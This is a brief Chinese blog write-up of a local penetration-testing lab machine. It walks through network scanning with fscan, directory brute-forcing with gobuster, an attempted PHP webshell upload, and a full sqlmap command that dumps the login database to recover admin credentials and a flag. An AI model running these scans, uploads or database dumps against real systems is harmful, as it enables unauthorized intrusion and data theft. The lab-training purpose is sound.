先扫描一下网段
fscan -h 192.168.64.0/24
192.168.64.3是我们的靶机,开放了web端口80,用nmap去扫描一下服务

就是apache服务,我们去访问一下网站

中途靶机重新配置了一下靶机ip变成
192.168.64.4 了貌似啥都没有,去扫一下目录看看能不能有有用的东西
gobuster dir -u http://192.168.64.4/ -w /Users/qin/Documents/渗透/Fuzz_dict/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,html,txt,bak,zip
扫到了exploit.html,去查看一下

发现有个文件上传的点,我们先上传一下php木马看看行不行

上传之后多出了莫名的字符,暂时不知道怎么利用。后面查看网上的wp发现还有enter_network这个路由(我的字典就扫不出来),去访问一下发现是个登陆框


直接dump数据库
sqlmap -u 'http://192.168.64.4/enter_network/' --data 'pass=1&sub=SEND&user=1' -D Machine --dump --batch 
得到了用户名和密码,去登陆一下用户名:
administrator ;密码:FLAG{N7:KSA_01}到这就获取了flag,这个靶机根本不能渗透进去,垃圾靶机
- 作者:NotionNext
- 链接:http://qetx.top/article/3bfb233d-8731-8074-86ba-ce6d0825da30
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章










